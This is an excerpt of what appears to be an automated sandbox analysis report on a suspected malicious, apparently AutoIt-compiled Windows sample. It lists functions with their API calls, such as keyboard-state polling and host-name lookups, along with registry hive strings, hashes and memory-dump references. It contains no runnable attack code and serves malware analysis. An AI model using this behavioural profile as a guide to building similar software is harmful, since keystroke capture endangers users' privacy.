                                                                        • Instruction ID: 43502314c0097a63828991829deef07e0628b2c15e06e25d136fe7eb557e62f2
                                                                        • Opcode Fuzzy Hash: 1797f436918ef2476b866235269cc90a012c2777c7f8b9511516745e61820b58
                                                                        • Instruction Fuzzy Hash: 6B412872C1022CEBCF21EBA4DC959EDB7B8BF04350F008269F951A3265DB759904DB90
                                                                        Function 0106147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0106040D,?,?), ref: 01061491
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpper
                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                        • API String ID: 3964851224-909552448
                                                                        • Opcode ID: bc51fbe41f5cefea9d1679a0e7a94a44b4816cd258af682e329fdf1f66601b15
                                                                        • Instruction ID: cd5701503ed1d23af5bf1e2f4a14e946fadafd5e030b54a1976f253e96d91a7e
                                                                        • Opcode Fuzzy Hash: bc51fbe41f5cefea9d1679a0e7a94a44b4816cd258af682e329fdf1f66601b15
                                                                        • Instruction Fuzzy Hash: 4041AE3090425ADBEF01EF54D960AEE7768BF92340F544446FCD2572A5DB30ED19DB60
                                                                        Function 01045882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FF1821: _memmove.LIBCMT ref: 00FF185B
                                                                          • Part of subcall function 00FF153B: _memmove.LIBCMT ref: 00FF15C4
                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 010458EB
                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 01045901
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 01045912
                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 01045924
                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 01045935
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: SendString$_memmove
                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                        • API String ID: 2279737902-1007645807
                                                                        • Opcode ID: 8f4a63f3f1259c814d02825692e422e7fe97ad1b7f82c0fb43567e62c174aeec
                                                                        • Instruction ID: f40edf773e8f5148e6e7a7ce488bc2edf2df55a9979c90fd70e0047c26e8aec0
                                                                        • Opcode Fuzzy Hash: 8f4a63f3f1259c814d02825692e422e7fe97ad1b7f82c0fb43567e62c174aeec
                                                                        • Instruction Fuzzy Hash: F111E27095012DFADB20E7B6DC9ADFF7B7CFF92B60F404429BD81A60A0DAA00D00D5A0
                                                                        Function 01044C0C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                        • String ID: 0.0.0.0
                                                                        • API String ID: 208665112-3771769585
                                                                        • Opcode ID: 5baba895c04cfc064311971d468a37f98583b4ed3d1b15e57e3748a828794544
                                                                        • Instruction ID: 3406d84e8c859fef464551ef95b731fadd3c0dcc9a1c3db22521d01c0ae09ddd
                                                                        • Opcode Fuzzy Hash: 5baba895c04cfc064311971d468a37f98583b4ed3d1b15e57e3748a828794544
                                                                        • Instruction Fuzzy Hash: 3F11277190410DABEBA2A7649C88EEA77ECDF41710F0842BAF0C9E60C4EF7595818B54
                                                                        Function 01045530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • timeGetTime.WINMM ref: 01045535
                                                                          • Part of subcall function 0100083E: timeGetTime.WINMM(?,00000002,00FEC22C), ref: 01000842
                                                                        • Sleep.KERNEL32(0000000A), ref: 01045561
                                                                        • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 01045585
                                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 010455A7
                                                                        • SetActiveWindow.USER32 ref: 010455C6
                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 010455D4
                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 010455F3
                                                                        • Sleep.KERNEL32(000000FA), ref: 010455FE
                                                                        • IsWindow.USER32 ref: 0104560A
                                                                        • EndDialog.USER32(00000000), ref: 0104561B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                        • String ID: BUTTON
                                                                        • API String ID: 1194449130-3405671355
                                                                        • Opcode ID: c4e1a1e23224fdf927b716f10f28ab5591fabd180870f00c866cf4f94a1f1e96
                                                                        • Instruction ID: 8e1fac2ae422a1cf8244fe4dfe652bd61264192be454d51679e5e887d487e7a1
                                                                        • Opcode Fuzzy Hash: c4e1a1e23224fdf927b716f10f28ab5591fabd180870f00c866cf4f94a1f1e96
                                                                        • Instruction Fuzzy Hash: 8721C2F0604605AFE7A16BB4ECC8B263B6AFB49745F505229F5C1D218CCB7B4940CB61
                                                                        Function 0104DBD0 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FE4D37: __itow.LIBCMT ref: 00FE4D62
                                                                          • Part of subcall function 00FE4D37: __swprintf.LIBCMT ref: 00FE4DAC
                                                                        • CoInitialize.OLE32(00000000), ref: 0104DC2D
                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0104DCC0
                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 0104DCD4
                                                                        • CoCreateInstance.OLE32(01073D4C,00000000,00000001,0109B86C,?), ref: 0104DD20
                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0104DD8F
                                                                        • CoTaskMemFree.OLE32(?,?), ref: 0104DDE7
                                                                        • _memset.LIBCMT ref: 0104DE24
                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0104DE60
                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0104DE83
                                                                        • CoTaskMemFree.OLE32(00000000), ref: 0104DE8A
                                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0104DEC1
                                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 0104DEC3
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                        • String ID:
                                                                        • API String ID: 1246142700-0
                                                                        • Opcode ID: d651829c1fcfc0ea13ec403b9caa3ad0326d81d1079dfe4cd7632b4281996b40
                                                                        • Instruction ID: 1ac9ecbd7236e397fb93231a3854fcfe9291ff97dfe49d644e4ca0b2aae93f3b
                                                                        • Opcode Fuzzy Hash: d651829c1fcfc0ea13ec403b9caa3ad0326d81d1079dfe4cd7632b4281996b40
                                                                        • Instruction Fuzzy Hash: 5CB1F975A00109AFDB14EFA5C888DAEBBF9FF88314B1484A9F945EB251DB31ED41CB50
                                                                        Function 0104081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 01040896
                                                                        • SetKeyboardState.USER32(?), ref: 01040901
                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 01040921
                                                                        • GetKeyState.USER32(000000A0), ref: 01040938
                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 01040967
                                                                        • GetKeyState.USER32(000000A1), ref: 01040978
                                                                        • GetAsyncKeyState.USER32(00000011), ref: 010409A4
                                                                        • GetKeyState.USER32(00000011), ref: 010409B2
                                                                        • GetAsyncKeyState.USER32(00000012), ref: 010409DB
                                                                        • GetKeyState.USER32(00000012), ref: 010409E9
                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 01040A12
                                                                        • GetKeyState.USER32(0000005B), ref: 01040A20
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: State$Async$Keyboard
                                                                        • String ID:
                                                                        • API String ID: 541375521-0
                                                                        • Opcode ID: 636a38ac3d7709b6e9638cab5b1e4d216e381bedd7fb56d556592770397b5de9
                                                                        • Instruction ID: bbd20290a45ebef639620052e1efa2db02a602da52dc7c4e619b1cc39e174d0b
                                                                        • Opcode Fuzzy Hash: 636a38ac3d7709b6e9638cab5b1e4d216e381bedd7fb56d556592770397b5de9
                                                                        • Instruction Fuzzy Hash: DE510AB4A043852BFB75E7B449907EABFF48F01280F0845ED97C2671C7DA64A68CC7A1
                                                                        Function 0103CE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,00000001), ref: 0103CE1C
                                                                        • GetWindowRect.USER32(00000000,?), ref: 0103CE2E
                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0103CE8C
                                                                        • GetDlgItem.USER32(?,00000002), ref: 0103CE97
                                                                        • GetWindowRect.USER32(00000000,?), ref: 0103CEA9
                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0103CEFD
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0103CF0B
                                                                        • GetWindowRect.USER32(00000000,?), ref: 0103CF1C
                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0103CF5F
                                                                        • GetDlgItem.USER32(?,000003EA), ref: 0103CF6D
                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0103CF8A
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0103CF97
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                        • String ID:
                                                                        • API String ID: 3096461208-0
                                                                        • Opcode ID: 092ac8f1e90fbe72c159e73302375414ec2fa19c74bbeb4ce9faf824403eb8a0
                                                                        • Instruction ID: 0131f4b2b2b90f4fb930c53d8e93d67a8d6b0b8c42ff9a967862684beaa8dfbf
                                                                        • Opcode Fuzzy Hash: 092ac8f1e90fbe72c159e73302375414ec2fa19c74bbeb4ce9faf824403eb8a0
                                                                        • Instruction Fuzzy Hash: A9515171F00205AFDB18CF6DCD95A6EBBF9FB88711F14826DF515E6284D771A9008B50
                                                                        Function 00FE23F7 Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FE1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FE2412,?,00000000,?,?,?,?,00FE1AA7,00000000,?), ref: 00FE1F76
                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00FE24AF
                                                                        • KillTimer.USER32(-00000001,?,?,?,?,00FE1AA7,00000000,?,?,00FE1EBE,?,?), ref: 00FE254A
                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 0101BFE7
                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FE1AA7,00000000,?,?,00FE1EBE,?,?), ref: 0101C018
                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FE1AA7,00000000,?,?,00FE1EBE,?,?), ref: 0101C02F
                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FE1AA7,00000000,?,?,00FE1EBE,?,?), ref: 0101C04B
                                                                        • DeleteObject.GDI32(00000000), ref: 0101C05D
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                        • String ID:
                                                                        • API String ID: 641708696-0
                                                                        • Opcode ID: 21742ee1354695c4a6d4f341fbf74b62810e8d71f9127271db02af2c823bd7b7
                                                                        • Instruction ID: 7f19acc6d00d366d0cad5e7a57767f3063f409e9ba9db34e87c0069faa7fd6b4
                                                                        • Opcode Fuzzy Hash: 21742ee1354695c4a6d4f341fbf74b62810e8d71f9127271db02af2c823bd7b7
                                                                        • Instruction Fuzzy Hash: F161C231940780DFE776DF19C948B2AB7F5FB41312F508659F0C256999C37AA881EF90
                                                                        Function 00FE2581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FE29AB: GetWindowLongW.USER32(?,000000EB), ref: 00FE29BC
                                                                        • GetSysColor.USER32(0000000F), ref: 00FE25AF
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ColorLongWindow
                                                                        • String ID:
                                                                        • API String ID: 259745315-0
                                                                        • Opcode ID: ef45a4a2b18ae4c57738c035f7c630883f1be18b25d938a3e58a8247be6d189b
                                                                        • Instruction ID: 0c8e4b6dcddcfa19d7bd53688f20fe14b8ef5fee48c7a86f895340c6577c3cce
                                                                        • Opcode Fuzzy Hash: ef45a4a2b18ae4c57738c035f7c630883f1be18b25d938a3e58a8247be6d189b
                                                                        • Instruction Fuzzy Hash: FE41EA314001849FDB715F29D888BB93B6AFB06335F184361FDA59A1D9E7358C41EB21
                                                                        Function 00FF29BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 01000B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00FF2A3E,?,00008000), ref: 01000BA7
                                                                          • Part of subcall function 01000284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FF2A58,?,00008000), ref: 010002A4
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FF2ADF
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00FF2C2C
                                                                          • Part of subcall function 00FF3EBE: _wcscpy.LIBCMT ref: 00FF3EF6
                                                                          • Part of subcall function 0100386D: _iswctype.LIBCMT ref: 01003875
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                        • API String ID: 537147316-3738523708
                                                                        • Opcode ID: d1320ea809e8b2518b6ffefdf5b0da24fb0da232358417f6bdb6dc41e4b2311b
                                                                        • Instruction ID: d3699f5024c16444555f66fce2a62c9f454c580cb776ccb230f920949e2393bd
                                                                        • Opcode Fuzzy Hash: d1320ea809e8b2518b6ffefdf5b0da24fb0da232358417f6bdb6dc41e4b2311b
                                                                        • Instruction Fuzzy Hash: 4702BA315083469FC764EF24C880AAFBBE5BF99354F00491DF6DA932A1DB34DA49DB42
                                                                        Function 0104AEEA Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharLowerBuffW.USER32(?,?,01070980), ref: 0104AF4E
                                                                        • GetDriveTypeW.KERNEL32(00000061,0109B5F0,00000061), ref: 0104B018
                                                                        • _wcscpy.LIBCMT ref: 0104B042
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                        • API String ID: 2820617543-1000479233
                                                                        • Opcode ID: 06265e697144025b986e7620c28dcb7f46ae2b7e0f701ade8b4ef672e4c2141a
                                                                        • Instruction ID: 134170a3cfcf29b5a166aadaa35981cc66ad9e5eb44583e1aaf3836e15f5e541
                                                                        • Opcode Fuzzy Hash: 06265e697144025b986e7620c28dcb7f46ae2b7e0f701ade8b4ef672e4c2141a
                                                                        • Instruction Fuzzy Hash: 7951CAB02483059BD720EF18CC91AAEBBE5FFA0750F50482DF5D6572E1EB31E909CA52
                                                                        Function 00FE4D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: __i64tow__itow__swprintf
                                                                        • String ID: %.15g$0x%p$False$True
                                                                        • API String ID: 421087845-2263619337
                                                                        • Opcode ID: 0fb9638b04454f1988d9c0d06b60036ede03551bcde61a96887d9521cfc89486
                                                                        • Instruction ID: cd507e7c116c3b9c23ed611f46f6799169956d928d6009ad33ccba4c3407250f
                                                                        • Opcode Fuzzy Hash: 0fb9638b04454f1988d9c0d06b60036ede03551bcde61a96887d9521cfc89486
                                                                        • Instruction Fuzzy Hash: 0641F6729042099FEB35DF68DC45EBA77E8FB04310F2044AEE189D7295EA35A901E710
                                                                        Function 01067777 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0106778F
                                                                        • CreateMenu.USER32 ref: 010677AA
                                                                        • SetMenu.USER32(?,00000000), ref: 010677B9
                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01067846
                                                                        • IsMenu.USER32(?), ref: 0106785C
                                                                        • CreatePopupMenu.USER32 ref: 01067866
                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 01067893
                                                                        • DrawMenuBar.USER32 ref: 0106789B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                        • String ID: 0$F
                                                                        • API String ID: 176399719-3044882817
                                                                        • Opcode ID: 799e7434a4fb78b449cf102a4477406fe81423ca59beedbd8b09345009027acd
                                                                        • Instruction ID: c155aab1cfc57fe45991c562cbdc40aaae9b8d4d06ed7b73dbbd604d84d683fc
                                                                        • Opcode Fuzzy Hash: 799e7434a4fb78b449cf102a4477406fe81423ca59beedbd8b09345009027acd
                                                                        • Instruction Fuzzy Hash: 2A416A74A00209EFEB20DF68D884E9ABBF9FF49314F144169FA85A7354D736A910CF90
                                                                        Function 01067AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 01067B83
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 01067B8A
